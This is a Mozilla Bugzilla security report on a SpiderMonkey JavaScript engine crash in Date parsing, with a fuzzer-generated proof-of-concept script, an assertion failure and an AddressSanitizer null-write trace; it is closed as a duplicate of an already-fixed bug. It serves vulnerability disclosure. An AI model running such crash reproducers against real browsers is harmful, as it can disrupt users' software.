Closed Bug 1872633 Opened 5 months ago Closed 5 months ago

Spidermonkey: SEGV at /js/src/jsdate.cpp:1100:5 in bool MatchesKeyword<unsigned char>(unsigned char const*, unsigned long, char const*)

Categories

(Core :: JavaScript Engine: JIT, defect)


RESOLVED DUPLICATE of bug 1872550

People

(Reporter: baksmali404, Unassigned)

Details

User Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Edg/119.0.0.0

Steps to reproduce:

version: master

$ git clone https://github.com/mozilla/gecko-dev
$ cd gecko-dev
$ git show
commit 05178ae3d8ed27d47b340094de52bd3f572a5e1d (HEAD -> master, origin/master, origin/HEAD)
Author: ffxbld <ffxbld@mozilla.com>
Date:   Thu Dec 21 13:00:04 2023 +0000

Reproduce

./dist/bin/js pocfile.js

pocfile.js

function f1() {
    return "zMb";
}
const v4 = [Date,Date,Date,Date,Date];
v4.toString = f1;
const v5 = [2147483649,v4];
class C6 extends Date {
}
C6.parse(v5);
// CRASH INFO
// ==========
// TERMSIG: 11
// STDERR:
// Assertion failure: IsAsciiLowercaseAlpha(*keyword), at /home/gandalf/fuzz/gecko-dev/js/src/jsdate.cpp:1100
// #01: ???[/home/gandalf/fuzz/gecko-dev/obj-fuzzbuild/dist/bin/js +0x256c987]
// #02: ???[/home/gandalf/fuzz/gecko-dev/obj-fuzzbuild/dist/bin/js +0x25714e4]
// #03: ???[/home/gandalf/fuzz/gecko-dev/obj-fuzzbuild/dist/bin/js +0x1cae707]
// #04: ???[/home/gandalf/fuzz/gecko-dev/obj-fuzzbuild/dist/bin/js +0x1cad963]
// #05: ???[/home/gandalf/fuzz/gecko-dev/obj-fuzzbuild/dist/bin/js +0x2aff8d5]
// #06: ??? (???:???)
// STDOUT:
// 
// FUZZER ARGS: .build/x86_64-unknown-linux-gnu/release/FuzzilliCli --profile=spidermonkey --storagePath=Targets/Spidermonkey/out3 /home/gandalf/fuzz/gecko-dev/obj-fuzzbuild/dist/bin/js --resume
// TARGET ARGS: /home/gandalf/fuzz/gecko-dev/obj-fuzzbuild/dist/bin/js --baseline-warmup-threshold=10 --ion-warmup-threshold=100 --ion-check-range-analysis --ion-extra-checks --fuzzing-safe --disable-oom-functions --reprl
// CONTRIBUTORS: IntegerGenerator, TrivialFunctionGenerator, StringGenerator, ProbingMutator
// EXECUTION TIME: 30ms
gc();

Actual results:

ASan report

Assertion failure: IsAsciiLowercaseAlpha(*keyword), at /home/gandalf/fuzz/gecko-dev/js/src/jsdate.cpp:1100
#01: ???[/home/gandalf/fuzz/gecko-dev/build_asan/dist/bin/js +0x3ef6892]
#02: ???[/home/gandalf/fuzz/gecko-dev/build_asan/dist/bin/js +0x3efda33]
#03: ???[/home/gandalf/fuzz/gecko-dev/build_asan/dist/bin/js +0x2e5d82f]
#04: ???[/home/gandalf/fuzz/gecko-dev/build_asan/dist/bin/js +0x2df00e9]
#05: ???[/home/gandalf/fuzz/gecko-dev/build_asan/dist/bin/js +0x2e1c7c1]
#06: ???[/home/gandalf/fuzz/gecko-dev/build_asan/dist/bin/js +0x2deeeed]
#07: ???[/home/gandalf/fuzz/gecko-dev/build_asan/dist/bin/js +0x2dee007]
#08: ???[/home/gandalf/fuzz/gecko-dev/build_asan/dist/bin/js +0x2df6db5]
#09: ???[/home/gandalf/fuzz/gecko-dev/build_asan/dist/bin/js +0x2df7acf]
#10: ???[/home/gandalf/fuzz/gecko-dev/build_asan/dist/bin/js +0x320189c]
#11: JS_ExecuteScript(JSContext*, JS::Handle<JSScript*>)[/home/gandalf/fuzz/gecko-dev/build_asan/dist/bin/js +0x3201e9e]
#12: ???[/home/gandalf/fuzz/gecko-dev/build_asan/dist/bin/js +0x2bfa837]
#13: ???[/home/gandalf/fuzz/gecko-dev/build_asan/dist/bin/js +0x2bf8561]
#14: ???[/home/gandalf/fuzz/gecko-dev/build_asan/dist/bin/js +0x2b44a02]
#15: ???[/home/gandalf/fuzz/gecko-dev/build_asan/dist/bin/js +0x2b37d79]
#16: ???[/lib/x86_64-linux-gnu/libc.so.6 +0x29d90]
#17: __libc_start_main[/lib/x86_64-linux-gnu/libc.so.6 +0x29e40]
#18: ???[/home/gandalf/fuzz/gecko-dev/build_asan/dist/bin/js +0x2a3a0c9]
#19: ??? (???:???)
AddressSanitizer:DEADLYSIGNAL
=================================================================
==2219029==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x55be60b7f8c7 bp 0x7ffe1119d290 sp 0x7ffe1119d0a0 T0)
==2219029==The signal is caused by a WRITE memory access.
==2219029==Hint: address points to the zero page.
    #0 0x55be60b7f8c7 in bool MatchesKeyword<unsigned char>(unsigned char const*, unsigned long, char const*) /home/gandalf/fuzz/gecko-dev/js/src/jsdate.cpp:1100:5
    #1 0x55be60b7f8c7 in bool ParseDate<unsigned char>(js::DateTimeInfo::ForceUTC, unsigned char const*, unsigned long, JS::ClippedTime*, bool*) /home/gandalf/fuzz/gecko-dev/js/src/jsdate.cpp:1724:14
    #2 0x55be60b7f8c7 in ParseDate(js::DateTimeInfo::ForceUTC, JSLinearString*, JS::ClippedTime*, JSContext*) /home/gandalf/fuzz/gecko-dev/js/src/jsdate.cpp:1877:21
    #3 0x55be60b86a32 in date_parse(JSContext*, unsigned int, JS::Value*) /home/gandalf/fuzz/gecko-dev/js/src/jsdate.cpp:1912:8
    #4 0x55be5fae682e in CallJSNative(JSContext*, bool (*)(JSContext*, unsigned int, JS::Value*), js::CallReason, JS::CallArgs const&) /home/gandalf/fuzz/gecko-dev/js/src/vm/Interpreter.cpp:479:13
    #5 0x55be5fa790e8 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct, js::CallReason) /home/gandalf/fuzz/gecko-dev/js/src/vm/Interpreter.cpp:573:12
    #6 0x55be5faa57c0 in js::CallFromStack(JSContext*, JS::CallArgs const&, js::CallReason) /home/gandalf/fuzz/gecko-dev/js/src/vm/Interpreter.cpp:645:10
    #7 0x55be5faa57c0 in js::Interpret(JSContext*, js::RunState&) /home/gandalf/fuzz/gecko-dev/js/src/vm/Interpreter.cpp:3060:16
    #8 0x55be5fa77eec in MaybeEnterInterpreterTrampoline(JSContext*, js::RunState&) /home/gandalf/fuzz/gecko-dev/js/src/vm/Interpreter.cpp:393:10
    #9 0x55be5fa77006 in js::RunScript(JSContext*, js::RunState&) /home/gandalf/fuzz/gecko-dev/js/src/vm/Interpreter.cpp:451:13
    #10 0x55be5fa7fdb4 in js::ExecuteKernel(JSContext*, JS::Handle<JSScript*>, JS::Handle<JSObject*>, js::AbstractFramePtr, JS::MutableHandle<JS::Value>) /home/gandalf/fuzz/gecko-dev/js/src/vm/Interpreter.cpp:838:13
    #11 0x55be5fa80ace in js::Execute(JSContext*, JS::Handle<JSScript*>, JS::Handle<JSObject*>, JS::MutableHandle<JS::Value>) /home/gandalf/fuzz/gecko-dev/js/src/vm/Interpreter.cpp:870:10
    #12 0x55be5fe8a89b in ExecuteScript(JSContext*, JS::Handle<JSObject*>, JS::Handle<JSScript*>, JS::MutableHandle<JS::Value>) /home/gandalf/fuzz/gecko-dev/js/src/vm/CompilationAndEvaluation.cpp:494:10
    #13 0x55be5fe8ae9d in JS_ExecuteScript(JSContext*, JS::Handle<JSScript*>) /home/gandalf/fuzz/gecko-dev/js/src/vm/CompilationAndEvaluation.cpp:518:10
    #14 0x55be5f883836 in RunFile(JSContext*, char const*, _IO_FILE*, CompileUtf8, bool, bool) /home/gandalf/fuzz/gecko-dev/js/src/shell/js.cpp:1220:10
    #15 0x55be5f881560 in Process(JSContext*, char const*, bool, FileKind) /home/gandalf/fuzz/gecko-dev/js/src/shell/js.cpp
    #16 0x55be5f7cda01 in ProcessArgs(JSContext*, js::cli::OptionParser*) /home/gandalf/fuzz/gecko-dev/js/src/shell/js.cpp:10875:10
    #17 0x55be5f7cda01 in Shell(JSContext*, js::cli::OptionParser*) /home/gandalf/fuzz/gecko-dev/js/src/shell/js.cpp:11137:12
    #18 0x55be5f7c0d78 in main /home/gandalf/fuzz/gecko-dev/js/src/shell/js.cpp:11534:12
    #19 0x7efd9b029d8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
    #20 0x7efd9b029e3f in __libc_start_main csu/../csu/libc-start.c:392:3
    #21 0x55be5f6c30c8 in _start (/home/gandalf/fuzz/gecko-dev/build_asan/dist/bin/js+0x2a3a0c8) (BuildId: c91ffe657845bd1ebd727cef4df11b4e)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/gandalf/fuzz/gecko-dev/js/src/jsdate.cpp:1100:5 in bool MatchesKeyword<unsigned char>(unsigned char const*, unsigned long, char const*)
==2219029==ABORTING

Expected results:

SEGV or crash

Credit:

Gandalf4a of PKU-Changsha Institute for Computing and Digital Economy
Group: core-security → javascript-core-security

Arai, is this a dupe of bug 1872550? Thanks.

Flags: needinfo?(arai.unmht)

Yes, this is a dupe, and fixed by the patch there.

Status: UNCONFIRMED → RESOLVED
Closed: 5 months ago
Duplicate of bug: 1872550
Flags: needinfo?(arai.unmht)
Resolution: --- → DUPLICATE
Group: javascript-core-security